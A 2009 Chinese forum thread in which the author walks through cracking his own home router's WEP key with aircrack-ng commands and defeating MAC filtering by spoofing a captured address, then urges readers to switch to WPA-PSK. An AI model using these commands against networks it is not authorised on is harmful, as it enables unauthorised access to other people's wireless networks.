系统集成论坛

标题: WEP加密太不安全了 [打印本页]

作者: 普天科创    时间: 2009-8-10 09:56
标题: WEP加密太不安全了
一直都听说无线网络的WEP加密方式不是那么安全,但具体有多不安全,也没个具体的概念,主要是没动手试过。。

      这个周末在家闲得蛋疼,突发奇想试下无线网络WEP加密方式的安全性。。

   试验环境:我自己家。。。  LINKSYS WRT54G, 采用WEP方式加密+MAC地址过滤+SSID隐藏。

   用另一台没有经过认证的笔记本试验,试验环境FEDORA 11

   1,首先安装工具 aircrack-ng ,这是一个工具包,从名字大家就可以看出来是用来破无线网络的, ng 听说好像是next generation的意思

   2,  运行 airmon-ng start wlan0
       系统报错,说是其它的进程如 NetworkManager占用了wlan0,但生成了 mon0,可以用来抓包(进入混杂模式)
  3,于是乎,运行 airodump-ng mon0
      可以看到附近有信号的所有的无线网络,还有好多没加密的,有不少WEP,还有一些WPA-PSK的,就选我自己的开工,记下AP的MAC地址
   4, 运行airodump-ng -bssid xx:xx:xx:xx  --ivs --channel 6 -w dump mon0
      -bssid 是指定AP的MAC地址,只抓这个MAC地址下的通信, --ivs是只抓IVS数据包, --channel 6,是因为开始看到这个AP是在六频道下,于是只抓这个频道的,不要这个参数也可以, -w dump 是指把文件写入dump这个文件,软件会自动加个序号,如 dump-01.cap, 如果不加 --ivs就会存成 cap, 加了就会存成 .ivs ,自己要看
      如果对方正在行进正常的通讯,一会,你就可以得到40000个data,得到以后,你就可以按ctrl+c停下来了
  5,运行 aircrack-ng -b xx:xx:xx:xx dump-01.ivs  
       如果你抓的包够了,密码很快就出来了。。

   这个时候,不用我再教了吧。。

  当然,对于还采用了MAC地址过滤的AP,多两步解决,在抓包的时候就注意看有哪个MAC地址是正在通讯的,记下来
    输入 ifconfig wlan0 down 把无线网卡停掉  
    输入 ifconfig wlan0 hw ether xx:xx:xx:xx  把这个改成你记下来的合法的mac地址
   输入 ifconfig wlan0 up 激活

  最后,你在无线管理器里点连接到这个无线网络。。万事OK。。。

   我的可怜的无线网络就这样着了道。。。。。所以,大家还是。。小心一点WEP全改成WPA-PSK吧。。。。。本文章由光纤版主原创。。请随意转载但请著名出处。
作者: 我是菜鸟    时间: 2009-8-27 10:17
有破解无线路由WEP的软件
作者: rain    时间: 2009-8-28 09:40
没有绝对安全的网络




欢迎光临 系统集成论坛 (http://bbs.xtjc.com/) Powered by Discuz! X3.1